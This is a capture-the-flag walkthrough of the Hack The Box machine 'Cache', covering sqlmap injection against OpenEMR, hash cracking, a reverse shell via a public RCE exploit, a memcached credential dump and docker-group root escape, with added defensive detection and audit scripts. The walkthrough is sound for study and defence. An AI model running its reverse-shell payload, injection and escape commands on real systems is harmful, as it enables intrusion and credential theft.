
Cache is a Linux machine rated medium on Hack The Box. It consists of enumerating to find another website running OpenEMR, then pivoting to a user with credentials obtained from the initial website, and finally obtaining root access by exploiting memcached and abusing docker group privileges.
## Enumeration
Running nmap:

```shell
nmap -sC -sV 10.10.10.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 15:41 CEST
Nmap scan report for 10.10.10.188
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Browsing to port 80 we find the following page:
There is a login page but we do not have credentials; inspecting the source code, a jQuery function is visible which contains the credentials:
We can log in, but it is a rabbit hole.
Then, enumerating the website, we find an about page and see that the author has another project called hms. We can add it to /etc/hosts as hms.htb:
Visiting
## Exploitation
I found a YouTube PoC exploit for it.
I create a user as in the PoC and then save the following request:
```shell
cat request.txt
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=nc6uq0oms8l5hcqja5cg7fkpul; PHPSESSID=q7ftl9ojp1vaej54d4esd4phlo
Upgrade-Insecure-Requests: 1
```
Using sqlmap with the saved request, the databases can be enumerated:
```shell
sqlmap -r request.txt --threads=10 --dbs
available databases [2]
[*] information_schema
[*] openemr
```
Now we dump tables:
```shell
sqlmap -r request.txt --threads=10 -D openemr --tables
| user_settings
| users
| users_facility
| users_secure
```
users_secure seems to be the table we are looking for, so we dump its contents:
```shell
sqlmap -r request.txt --threads=10 -D openemr -T users_secure --dump
```
From it we obtain the user openemr_admin and a hashed password: `$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.`
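The injection sqlmap is exercising above is in the eid parameter of add_edit_event_user.php, and from the defender's side an sqlmap run is noisy in the web server's access log. The following Python script is an added example, not part of the original writeup: it scans Apache combined-format log lines (constructed for this example, shaped like the request above, and not real traffic from the box) for the usual injection indicators and for sqlmap's default User-Agent. The application-side fix is to pass eid as a bound query parameter instead of concatenating it into SQL.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache "combined" access-log lines shaped like what an sqlmap run against
# the vulnerable eid parameter leaves behind. They are made up for this example; only the
# first and last requests are normal ones.
SAMPLE_ACCESS_LOG = """\
10.10.14.46 - - [04/Sep/2020:15:52:01 +0200] "GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.46 - - [04/Sep/2020:15:52:02 +0200] "GET /portal/add_edit_event_user.php?eid=1%20AND%201%3D1 HTTP/1.1" 200 2048 "-" "sqlmap/1.4.8#stable (http://sqlmap.org)"
10.10.14.46 - - [04/Sep/2020:15:52:03 +0200] "GET /portal/add_edit_event_user.php?eid=1%20AND%20SLEEP(5) HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.46 - - [04/Sep/2020:15:52:04 +0200] "GET /portal/add_edit_event_user.php?eid=1%20UNION%20ALL%20SELECT%20NULL,NULL--%20 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.46 - - [04/Sep/2020:15:52:05 +0200] "GET /portal/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against the URL-decoded query string.
SQLI_PATTERNS = [
    ("tautology", re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("time-based", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("comment-terminator", re.compile(r"(?:--|#)\s*$")),
]
# sqlmap announces itself unless the operator overrides the User-Agent.
SQLMAP_UA = re.compile(r"sqlmap", re.I)


def scan_line(line):
    """Return a finding dict for one access-log line, or None if it looks clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, raw_query = m.group("path").partition("?")
    query = unquote_plus(raw_query)
    indicators = [name for name, pat in SQLI_PATTERNS if pat.search(query)]
    if SQLMAP_UA.search(m.group("ua")):
        indicators.append("sqlmap-user-agent")
    if not indicators:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": path, "indicators": indicators}


def scan_access_log(text):
    """Scan a whole log and return the list of findings in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} -> {', '.join(f['indicators'])}")
```

The patterns are deliberately simple signatures; they catch the default sqlmap behaviour seen above but a tampered or slow run can evade them, so they belong alongside rate-based alerting on a single source hitting one script with many distinct query strings.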
This password will be cracked with john:
```shell
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
?:xxxxxx
1 password hash cracked, 0 left
```
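The hash that john just cracked starts with `$2a$05$`, so it is bcrypt with a cost factor of 5, far below the commonly recommended 10 to 12; that low work factor keeps offline guessing cheap. As an added example that is not part of the original writeup, the Python below parses the modular-crypt bcrypt format to pull out the cost, audits a set of stored hashes for weak ones, and shows how much a higher cost slows an offline attacker. The rows are constructed: the openemr_admin hash is the one shown above, the other two are made-up placeholders.

```python
import re

# bcrypt in modular-crypt form: $2<variant>$<2-digit cost>$<22-char salt><31-char digest>,
# 60 characters in total. The cost is log2 of the key-stretching iteration count.
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(?P<cost>\d{2})\$[./A-Za-z0-9]{53}$")

# Constructed sample rows as they might come out of a users_secure-style table.
# The openemr_admin hash is the one shown above; the other two are made-up placeholders
# (a cost-12 bcrypt-shaped string and an unsalted MD5), not real hashes of anything.
SAMPLE_ROWS = [
    ("openemr_admin", "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."),
    ("nurse1", "$2b$12$" + "A" * 53),
    ("legacy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def bcrypt_cost(hash_str):
    """Return the bcrypt work factor, or None if the string is not a bcrypt hash."""
    m = BCRYPT_RE.match(hash_str)
    return int(m.group("cost")) if m else None


def slowdown_factor(from_cost, to_cost):
    """How many times more work one offline guess costs at to_cost than at from_cost."""
    return 2 ** (to_cost - from_cost)


def audit_password_hashes(rows, min_cost=10):
    """Flag rows whose hash is not bcrypt at all or uses a cost below min_cost.

    Returns a list of (username, reason) tuples in input order."""
    findings = []
    for username, h in rows:
        cost = bcrypt_cost(h)
        if cost is None:
            findings.append((username, "not-bcrypt"))
        elif cost < min_cost:
            findings.append((username, f"low-cost:{cost}"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_password_hashes(SAMPLE_ROWS):
        print(f"{user}: {reason}")
    print("raising cost 5 -> 12 multiplies guess cost by", slowdown_factor(5, 12))
```

Because the cost is stored inside the hash, an audit like this needs no secrets: re-hash at a higher cost on the user's next successful login and the weak entries disappear over time.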
Now that we have credentials, we can use the following RCE exploit to obtain a reverse shell: <https://www.exploit-db.com/exploits/45161>
```shell
python openemr.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.46/443 0>&1'
.---. ,---. ,---. .-. .-.,---. ,---.
/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\
| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/
| | | | | |--' | .-' | |\ || .-' (_)\/ || (
\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \
)---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\
(_) (__) (__) (__) (__) '-' '-' (__)
={ P R O J E C T I N S E C U R I T Y }=
Twitter : @Insecurity
Site : insecurity.sh
[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload
```
And we obtain a reverse shell as www-data:
```shell
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.10.188] 36386
bash: cannot set terminal process group (1811): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
www-data
```
The user ash exists on the system, so we can su to it with the credentials found on the website:
```shell
www-data@cache:/home$ su ash
Password:
ash@cache:/home$ whoami
ash
```
## Privilege Escalation
Listing the locally listening services, we find port 11211 open:
```shell
ash@cache:/home$ ss -tnl
State   Recv-Q   Send-Q   Local Address:Port   Peer Address:Port
LISTEN  0        80       127.0.0.1:3306       0.0.0.0:*
LISTEN  0        128      127.0.0.1:11211      0.0.0.0:*
LISTEN  0        128      127.0.0.53%lo:53     0.0.0.0:*
LISTEN  0        128      0.0.0.0:22           0.0.0.0:*
LISTEN  0        128      *:80                 *:*
LISTEN  0        128      [::]:22              [::]:*
```
This port corresponds to memcached, from which we can dump the stored data. We can connect to it through telnet:
```shell
ash@cache:/home$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
```
Then we can retrieve the user and password:
```shell
get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
```
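Memcached's text protocol has no authentication, so anything an application caches is readable by every local user who can reach the socket, which is exactly what the session above exploits. As an added example that is not part of the original writeup, the Python below parses the two reply formats seen above (`ITEM` lines from `stats cachedump` and `VALUE` blocks from `get`) and audits the cache for keys that look like credentials or never expire. The transcript it runs on is constructed for the example; its keys and values are made up, not the box's data.

```python
import re

# Constructed memcached text-protocol output in the same shape as the telnet session above
# (one "stats cachedump" listing followed by two "get" replies). Keys and values are made up.
SAMPLE_TRANSCRIPT = (
    "ITEM link [21 b; 0 s]\r\n"
    "ITEM user [5 b; 0 s]\r\n"
    "ITEM passwd [9 b; 0 s]\r\n"
    "ITEM report_cache [512 b; 1599229200 s]\r\n"
    "END\r\n"
    "VALUE user 0 5\r\n"
    "alice\r\n"
    "END\r\n"
    "VALUE passwd 0 9\r\n"
    "hunter2xx\r\n"
    "END\r\n"
)

# "ITEM <key> [<bytes> b; <expiry> s]" where expiry is an absolute unix time, 0 = never.
ITEM_RE = re.compile(r"^ITEM (?P<key>\S+) \[(?P<bytes>\d+) b; (?P<exp>\d+) s\]$")
# "VALUE <key> <flags> <bytes> [<cas>]" followed by exactly <bytes> bytes of data.
VALUE_RE = re.compile(r"^VALUE (?P<key>\S+) (?P<flags>\d+) (?P<bytes>\d+)(?: (?P<cas>\d+))?$")
# Key names that suggest credentials or session material was cached.
SENSITIVE_KEY = re.compile(r"user|pass|pwd|secret|token|cred|account|session|auth", re.I)


def parse_cachedump(text):
    """Map key -> {'bytes', 'exp'} from the ITEM lines of a stats cachedump reply."""
    items = {}
    for line in text.splitlines():
        m = ITEM_RE.match(line)
        if m:
            items[m.group("key")] = {"bytes": int(m.group("bytes")), "exp": int(m.group("exp"))}
    return items


def parse_get_replies(text):
    """Map key -> value for every VALUE block, honouring the byte count so that values
    containing newlines are not split (which is why this does not use splitlines)."""
    buf = text.encode()
    values, pos = {}, 0
    while True:
        nl = buf.find(b"\n", pos)
        if nl == -1:
            break
        m = VALUE_RE.match(buf[pos:nl].rstrip(b"\r").decode(errors="replace"))
        if m:
            n, start = int(m.group("bytes")), nl + 1
            values[m.group("key")] = buf[start:start + n].decode(errors="replace")
            pos = start + n          # the data block's trailing CRLF is skipped next round
        else:
            pos = nl + 1
    return values


def audit_cache(text):
    """Return {key: [reasons]} for cached items a defender should question."""
    findings = {}
    for key, meta in parse_cachedump(text).items():
        reasons = []
        if SENSITIVE_KEY.search(key):
            reasons.append("sensitive-key-name")
        if meta["exp"] == 0:
            reasons.append("never-expires")
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for key, reasons in audit_cache(SAMPLE_TRANSCRIPT).items():
        print(f"{key}: {', '.join(reasons)}")
    print("values retrieved:", parse_get_replies(SAMPLE_TRANSCRIPT))
```

Binding to 127.0.0.1, as this box does, only keeps remote clients out; it does nothing against a local foothold like the www-data shell above. The durable fixes are not caching credentials at all, giving cached entries an expiry, and running memcached on a Unix socket with restrictive permissions (its `-s` and `-a` options) or with SASL enabled so that a local account still needs credentials to read the cache.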
With these credentials we can log in as luffy via SSH:
```shell
ssh luffy@10.10.10.188
```
After logging in we see that the user luffy belongs to the docker group:
```shell
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
```
A root shell can be obtained following GTFOBins:
```shell
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
```
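Membership of the docker group is root in all but name, because the daemon runs as root and will bind-mount any host path into a container on request, which is all the command above does. As an added example that is not part of the original writeup or of GTFOBins, the Python below does the two checks a defender wants here: it lists members of root-equivalent groups from an /etc/group file, and it flags `docker run` command lines (as they would appear in shell history or auditd execve records) that mount sensitive host paths, run privileged, or share the host PID namespace. The group file excerpt is constructed to mirror the id output above, not copied from the box.

```python
import os
import shlex

# Groups whose members can become root without a password prompt.
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "sudo", "wheel", "disk"}
# Host paths that, bind-mounted into a container, hand over the host.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root"}

# Constructed /etc/group excerpt (not the box's real file) mirroring the id output above.
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:
docker:x:999:luffy
lxd:x:117:
ash:x:1000:
luffy:x:1001:
"""


def root_equivalent_members(group_text):
    """Return {group: [members]} for root-equivalent groups that have any members."""
    found = {}
    for line in group_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _passwd, _gid, members = line.split(":", 3)
        if name in ROOT_EQUIVALENT_GROUPS and members:
            found[name] = members.split(",")
    return found


def _host_source(spec):
    """Extract the host-side path from a -v SRC:DST[:opts] or --mount k=v,... spec."""
    head = spec.split(",", 1)[0]
    if "=" not in head:                       # -v / --volume form
        src = spec.split(":", 1)[0]
        return src if src.startswith("/") else None   # named volumes are not host paths
    for part in spec.split(","):              # --mount form
        key, _, value = part.partition("=")
        if key in ("source", "src"):
            return value
    return None


def flag_docker_escape(cmdline):
    """Reasons a docker command line yields host root, or [] if none are found."""
    argv = shlex.split(cmdline)
    if len(argv) < 2 or os.path.basename(argv[0]) != "docker":
        return []
    reasons = []
    for i, arg in enumerate(argv):
        spec = None
        if arg in ("-v", "--volume", "--mount") and i + 1 < len(argv):
            spec = argv[i + 1]
        elif arg.startswith(("-v=", "--volume=", "--mount=")):
            spec = arg.split("=", 1)[1]
        if spec is not None:
            src = _host_source(spec)
            if src is not None and os.path.normpath(src) in SENSITIVE_HOST_PATHS:
                reasons.append(f"host-path-mounted:{os.path.normpath(src)}")
        if arg == "--privileged":
            reasons.append("privileged")
        if arg == "--pid=host" or (arg == "--pid" and i + 1 < len(argv) and argv[i + 1] == "host"):
            reasons.append("host-pid-namespace")
    return reasons


if __name__ == "__main__":
    print("root-equivalent group members:", root_equivalent_members(SAMPLE_GROUP_FILE))
    print(flag_docker_escape("docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh"))
```

The mitigation is to treat docker group membership as sudo-without-a-password: grant it only to accounts that are already trusted as root, or run the daemon rootless (or with user-namespace remapping) so that a mount of `/` inside a container no longer lands as uid 0 on the host.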